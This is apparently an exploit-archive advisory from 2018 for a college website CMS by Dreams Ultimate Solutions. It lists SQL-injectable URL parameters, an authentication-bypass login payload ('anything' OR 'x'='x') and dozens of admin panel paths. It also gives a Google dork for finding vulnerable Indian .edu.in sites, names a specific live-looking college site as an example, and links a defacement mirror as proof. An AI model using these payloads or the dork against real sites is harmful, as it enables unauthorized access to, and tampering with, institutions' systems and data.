#################################################################################################
# Exploit Title : Dreams Ultimate Solutions DreamSus India Improper Authorization and SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 09/11/2018
# Vendor Homepage : dreamsus.com
# Tested On : Windows and Linux
# Category : WebApps
# Version Information :
# Google Dork : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# + CWE-592 [ Authentication Bypass Issues ] + CWE-284 [ Improper Access Control ] + CWE-285 [ Improper Authorization ]
#################################################################################################
# SQL Injection Exploit :
/upcoming_events.php?type=event&d_id=[SQL Injection]
/news_details.php?newsid=[SQL Injection]
/news_home_detail.php?newsid=[SQL Injection]
/college_staff.php?d_id=[SQL Injection]
/research.php?type=research&d_id=[SQL Injection]
/college_courses.php?type=Under%20Graduate&d_id=[SQL Injection]
/college_courses.php?type=Post%20Graduate&d_id=[SQL Injection]
/college_courses.php?type=Skill%20Development&d_id=[SQL Injection]
/college_courses.php?type=Other%20Courses&d_id=[SQL Injection]
#################################################################################################
# Admin Panel Login Path :
/login.php
Admin Username : anything' OR 'x'='x
Admin Password : anything' OR 'x'='x
/show_department.php
/crud_department.php?action=update&uid=1
/show_faculty.php
/crud_faculty.php?action=update&uid=1
/show_ac_year.php
/crud_ac_year.php?action=update&uid=1
/show_staff_type.php
/crud_staff_type.php?action=update&uid=1
/show_designation.php
/crud_designation.php?action=update&uid=1
/show_event_type.php
/crud_event_type.php?action=update&uid=2
/show_course_type.php
/crud_course_type.php?action=update&uid=1
/show_award_type.php
/crud_award_type.php?action=update&uid=1
/show_password.php
/crud_password.php?action=update&uid=1
/show_department_info.php
/show_staff_details.php
/show_dept_facilities.php
/show_courses.php
/show_courses.php?type=1
/show_courses.php?type=2
/show_courses.php?type=3
/show_event.php
/show_collaboration.php
/show_staff_achievement.php
/show_staff_acheievement_image.php
/show_student_achievement.php
/show_stud_acheievement_image.php
/show_download.php
/show_placementcell.php
/show_placement_alumni.php
/show_pc_collaboration.php
/show_dir_admin.php
/show_dir_other.php
/show_news.php
/show_video.php
/show_notice.php
/show_award.php
/show_testimonial.php
/show_gallery.php
/show_faq.php
/show_admission.php
/show_previous_paper.php
/show_hostel.php
/show_hostel_gallery.php
/show_commitee.php
/show_commitee_member.php
/show_commitee_work.php
/show_research.php
/show_publication.php
/show_research_grant.php
/show_feedback.php
#################################################################################################
# Example Vulnerable Site =>
[+] spcollegejejuri.edu.in/news_home_detail.php?newsid=6%27
=> [ Proof of Concept ] => zone-h.org/mirror/id/31868951 ~ archive.is/RhfMw
#################################################################################################
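# SQL Database Error : [ a PHP fatal error rather than a database message : the query failed and returned a boolean, the result was used without being checked, and the displayed error discloses the server file path ]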
Fatal error: Call to a member function fetch_assoc() on boolean in /home/spcolleg/public_html/news_details.php on line 128
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################